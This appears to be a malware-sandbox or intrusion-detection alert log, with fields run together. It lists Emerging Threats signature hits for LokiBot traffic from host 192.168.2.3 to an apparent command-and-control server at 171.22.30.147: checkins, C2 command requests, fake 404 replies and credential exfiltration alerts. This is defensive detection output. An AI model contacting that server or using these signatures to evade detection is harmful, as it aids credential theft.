              192.168.2.3171.22.30.14750006802024318 01/05/23-08:53:41.552586TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750029802024313 01/05/23-08:53:49.112211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749874802825766 01/05/23-08:53:02.624496TCP2825766ETPRO TROJAN LokiBot Checkin M24987480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749761802024318 01/05/23-08:52:28.591148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749922802021641 01/05/23-08:53:17.061545TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749979802021641 01/05/23-08:53:34.430839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749761802024313 01/05/23-08:52:28.591148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749838802024318 01/05/23-08:52:52.824149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749743802024313 01/05/23-08:52:23.467755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749743802024318 01/05/23-08:52:23.467755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749838802024313 01/05/23-08:52:52.824149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749735802025381 01/05/23-08:52:21.259701TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749995802025381 01/05/23-08:53:38.676723TCP2025381ET TROJAN LokiBot Checkin4999580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749823802021641 01/05/23-08:52:47.379297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749910802025381 01/05/23-08:53:13.740225TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497692025483 01/05/23-08:52:30.909539TCP2025483ET TROJAN LokiBot Fake 404 Response8049769171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749771802024318 01/05/23-08:52:31.374001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749864802825766 01/05/23-08:52:59.960618TCP2825766ETPRO TROJAN LokiBot Checkin M24986480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749771802024313 01/05/23-08:52:31.374001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749969802021641 01/05/23-08:53:31.782144TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497472025483 01/05/23-08:52:24.664652TCP2025483ET TROJAN LokiBot Fake 404 Response8049747171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750002802025381 01/05/23-08:53:40.505314TCP2025381ET TROJAN LokiBot Checkin5000280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749889802024313 01/05/23-08:53:06.674333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497362025483 01/05/23-08:52:21.623629TCP2025483ET TROJAN LokiBot Fake 404 Response8049736171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749967802025381 01/05/23-08:53:31.230819TCP2025381ET TROJAN LokiBot Checkin4996780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749889802024318 01/05/23-08:53:06.674333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749836802825766 01/05/23-08:52:51.681664TCP2825766ETPRO TROJAN LokiBot Checkin M24983680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749707802025381 01/05/23-08:52:10.342729TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749937802024318 01/05/23-08:53:21.090422TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497252025483 01/05/23-08:52:18.471891TCP2025483ET TROJAN LokiBot Fake 404 Response8049725171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749890802025381 01/05/23-08:53:06.934564TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749699802825766 01/05/23-08:52:06.870270TCP2825766ETPRO TROJAN LokiBot Checkin M24969980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749991802825766 01/05/23-08:53:37.629731TCP2825766ETPRO TROJAN LokiBot Checkin M24999180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750057802024318 01/05/23-08:53:56.743180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750059802025381 01/05/23-08:53:57.279795TCP2025381ET TROJAN LokiBot Checkin5005980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750030802025381 01/05/23-08:53:49.383588TCP2025381ET TROJAN LokiBot Checkin5003080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749705802024313 01/05/23-08:52:09.363911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749879802021641 01/05/23-08:53:03.965987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749919802024313 01/05/23-08:53:16.188265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749950802024318 01/05/23-08:53:24.624259TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750050802825766 01/05/23-08:53:54.799294TCP2825766ETPRO TROJAN LokiBot Checkin M25005080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749807802025381 01/05/23-08:52:43.044779TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749817802825766 01/05/23-08:52:45.747633TCP2825766ETPRO TROJAN LokiBot Checkin M24981780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749773802025381 01/05/23-08:52:31.909319TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498172025483 01/05/23-08:52:45.827002TCP2025483ET TROJAN LokiBot Fake 404 Response8049817171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749824802024313 01/05/23-08:52:47.639113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749950802024313 01/05/23-08:53:24.624259TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749722802825766 01/05/23-08:52:17.506386TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749919802024318 01/05/23-08:53:16.188265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499422025483 01/05/23-08:53:22.531244TCP2025483ET TROJAN LokiBot Fake 404 Response8049942171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750076802021641 01/05/23-08:54:01.789357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749751802021641 01/05/23-08:52:25.762510TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749905802025381 01/05/23-08:53:12.409052TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749755802825766 01/05/23-08:52:26.961334TCP2825766ETPRO TROJAN LokiBot Checkin M24975580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749712802025381 01/05/23-08:52:12.436257TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497552025483 01/05/23-08:52:27.042461TCP2025483ET TROJAN LokiBot Fake 404 Response8049755171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749810802025381 01/05/23-08:52:43.863274TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499012025483 01/05/23-08:53:11.433874TCP2025483ET TROJAN LokiBot Fake 404 Response8049901171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749975802024318 01/05/23-08:53:33.363507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750023802021641 01/05/23-08:53:47.546596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749880802024313 01/05/23-08:53:04.232334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749762802024313 01/05/23-08:52:28.868227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749880802024318 01/05/23-08:53:04.232334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749975802024313 01/05/23-08:53:33.363507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749863802025381 01/05/23-08:52:59.703117TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749762802024318 01/05/23-08:52:28.868227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749958802025381 01/05/23-08:53:27.233105TCP2025381ET TROJAN LokiBot Checkin4995880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750043802021641 01/05/23-08:53:52.949985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749900802025381 01/05/23-08:53:10.997847TCP2025381ET TROJAN LokiBot Checkin4990080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749748802021641 01/05/23-08:52:24.879047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749994802025381 01/05/23-08:53:38.408241TCP2025381ET TROJAN LokiBot Checkin4999480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750019802825766 01/05/23-08:53:45.311637TCP2825766ETPRO TROJAN LokiBot Checkin M25001980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497962025483 01/05/23-08:52:40.072266TCP2025483ET TROJAN LokiBot Fake 404 Response8049796171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497922025483 01/05/23-08:52:38.965247TCP2025483ET TROJAN LokiBot Fake 404 Response8049792171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749784802021641 01/05/23-08:52:36.673037TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749927802024313 01/05/23-08:53:18.426652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750001802024313 01/05/23-08:53:40.243949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749927802024318 01/05/23-08:53:18.426652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749781802025381 01/05/23-08:52:35.821668TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750055802825766 01/05/23-08:53:56.183544TCP2825766ETPRO TROJAN LokiBot Checkin M25005580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498062025483 01/05/23-08:52:42.859984TCP2025483ET TROJAN LokiBot Fake 404 Response8049806171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749925802025381 01/05/23-08:53:17.874226TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749841802021641 01/05/23-08:52:53.743125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750001802024318 01/05/23-08:53:40.243949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749837802825766 01/05/23-08:52:51.988001TCP2825766ETPRO TROJAN LokiBot Checkin M24983780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749717802025381 01/05/23-08:52:14.673219TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749935802825766 01/05/23-08:53:20.565175TCP2825766ETPRO TROJAN LokiBot Checkin M24993580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749988802024318 01/05/23-08:53:36.817903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750045802025381 01/05/23-08:53:53.481872TCP2025381ET TROJAN LokiBot Checkin5004580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750081802025381 01/05/23-08:54:03.233046TCP2025381ET TROJAN LokiBot Checkin5008180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750034802024313 01/05/23-08:53:50.478539TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749970802024318 01/05/23-08:53:32.043326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750020802025381 01/05/23-08:53:45.631791TCP2025381ET TROJAN LokiBot Checkin5002080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749771802021641 01/05/23-08:52:31.374001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749706802024313 01/05/23-08:52:09.771973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749804802024313 01/05/23-08:52:42.167879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749873802825766 01/05/23-08:53:02.352866TCP2825766ETPRO TROJAN LokiBot Checkin M24987380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499122025483 01/05/23-08:53:14.416891TCP2025483ET TROJAN LokiBot Fake 404 Response8049912171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749914802024313 01/05/23-08:53:14.852027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749970802024313 01/05/23-08:53:32.043326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750012802025381 01/05/23-08:53:43.190304TCP2025381ET TROJAN LokiBot Checkin5001280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749938802025381 01/05/23-08:53:21.374225TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749914802024318 01/05/23-08:53:14.852027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749961802025381 01/05/23-08:53:29.597138TCP2025381ET TROJAN LokiBot Checkin4996180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749706802024318 01/05/23-08:52:09.771973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749739802024313 01/05/23-08:52:22.339123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750034802024318 01/05/23-08:53:50.478539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749846802021641 01/05/23-08:52:55.097334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749896802025381 01/05/23-08:53:08.759564TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749983802024318 01/05/23-08:53:35.478290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749988802024313 01/05/23-08:53:36.817903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749725802025381 01/05/23-08:52:18.390674TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749983802024313 01/05/23-08:53:35.478290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749965802021641 01/05/23-08:53:30.671447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750039802024318 01/05/23-08:53:51.865723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750025802025381 01/05/23-08:53:48.086655TCP2025381ET TROJAN LokiBot Checkin5002580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499642025483 01/05/23-08:53:30.482276TCP2025483ET TROJAN LokiBot Fake 404 Response8049964171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750033802024318 01/05/23-08:53:50.199257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750039802024313 01/05/23-08:53:51.865723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749936802825766 01/05/23-08:53:20.832811TCP2825766ETPRO TROJAN LokiBot Checkin M24993680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749738802024313 01/05/23-08:52:22.066688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749841802825766 01/05/23-08:52:53.743125TCP2825766ETPRO TROJAN LokiBot Checkin M24984180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749932802021641 01/05/23-08:53:19.762349TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750016802025381 01/05/23-08:53:44.267939TCP2025381ET TROJAN LokiBot Checkin5001680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750070802024318 01/05/23-08:54:00.166694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749739802024318 01/05/23-08:52:22.339123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749837802024318 01/05/23-08:52:51.988001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749930802825766 01/05/23-08:53:19.220224TCP2825766ETPRO TROJAN LokiBot Checkin M24993080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750070802024313 01/05/23-08:54:00.166694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749981802025381 01/05/23-08:53:34.961120TCP2025381ET TROJAN LokiBot Checkin4998180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499202025483 01/05/23-08:53:16.592848TCP2025483ET TROJAN LokiBot Fake 404 Response8049920171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499232025483 01/05/23-08:53:17.413136TCP2025483ET TROJAN LokiBot Fake 404 Response8049923171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750014802024313 01/05/23-08:53:43.719267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497702025483 01/05/23-08:52:31.194343TCP2025483ET TROJAN LokiBot Fake 404 Response8049770171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749992802825766 01/05/23-08:53:37.885447TCP2825766ETPRO TROJAN LokiBot Checkin M24999280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750014802024318 01/05/23-08:53:43.719267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749837802024313 01/05/23-08:52:51.988001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749738802024318 01/05/23-08:52:22.066688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500752025483 01/05/23-08:54:01.598104TCP2025483ET TROJAN LokiBot Fake 404 Response8050075171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497812025483 01/05/23-08:52:35.903217TCP2025483ET TROJAN LokiBot Fake 404 Response8049781171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749719802024318 01/05/23-08:52:15.841614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497022025483 01/05/23-08:52:08.238277TCP2025483ET TROJAN LokiBot Fake 404 Response8049702171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749719802024313 01/05/23-08:52:15.841614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749992802021641 01/05/23-08:53:37.885447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749840802825766 01/05/23-08:52:53.465268TCP2825766ETPRO TROJAN LokiBot Checkin M24984080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749936802021641 01/05/23-08:53:20.832811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499752025483 01/05/23-08:53:33.447961TCP2025483ET TROJAN LokiBot Fake 404 Response8049975171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749751802825766 01/05/23-08:52:25.762510TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749795802024318 01/05/23-08:52:39.717554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749847802021641 01/05/23-08:52:55.372015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749893802024318 01/05/23-08:53:07.754435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749945802021641 01/05/23-08:53:23.275014TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500342025483 01/05/23-08:53:50.559615TCP2025483ET TROJAN LokiBot Fake 404 Response8050034171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749795802024313 01/05/23-08:52:39.717554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749876802025381 01/05/23-08:53:03.175112TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749893802024313 01/05/23-08:53:07.754435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499532025483 01/05/23-08:53:25.551278TCP2025483ET TROJAN LokiBot Fake 404 Response8049953171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749968802825766 01/05/23-08:53:31.490288TCP2825766ETPRO TROJAN LokiBot Checkin M24996880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749879802825766 01/05/23-08:53:03.965987TCP2825766ETPRO TROJAN LokiBot Checkin M24987980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749884802024313 01/05/23-08:53:05.293982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749866802021641 01/05/23-08:53:00.520534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749884802024318 01/05/23-08:53:05.293982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749839802025381 01/05/23-08:52:53.202583TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499312025483 01/05/23-08:53:19.563898TCP2025483ET TROJAN LokiBot Fake 404 Response8049931171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749923802021641 01/05/23-08:53:17.329996TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749895802025381 01/05/23-08:53:08.372653TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750075802021641 01/05/23-08:54:01.517358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750075802825766 01/05/23-08:54:01.517358TCP2825766ETPRO TROJAN LokiBot Checkin M25007580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500782025483 01/05/23-08:54:02.394122TCP2025483ET TROJAN LokiBot Fake 404 Response8050078171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749700802024317 01/05/23-08:52:07.351938TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500562025483 01/05/23-08:53:56.550069TCP2025483ET TROJAN LokiBot Fake 404 Response8050056171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749700802024312 01/05/23-08:52:07.351938TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750056802021641 01/05/23-08:53:56.463023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500672025483 01/05/23-08:53:59.459785TCP2025483ET TROJAN LokiBot Fake 404 Response8050067171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749949802825766 01/05/23-08:53:24.361661TCP2825766ETPRO TROJAN LokiBot Checkin M24994980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749824802024318 01/05/23-08:52:47.639113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500452025483 01/05/23-08:53:53.560541TCP2025483ET TROJAN LokiBot Fake 404 Response8050045171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749913802024318 01/05/23-08:53:14.593137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750033802024313 01/05/23-08:53:50.199257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749742802825766 01/05/23-08:52:23.189713TCP2825766ETPRO TROJAN LokiBot Checkin M24974280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749955802825766 01/05/23-08:53:25.989714TCP2825766ETPRO TROJAN LokiBot Checkin M24995580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749962802025381 01/05/23-08:53:29.855666TCP2025381ET TROJAN LokiBot Checkin4996280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749859802025381 01/05/23-08:52:58.622571TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749861802024318 01/05/23-08:52:59.149010TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749728802825766 01/05/23-08:52:19.268418TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.3171.22.30.147
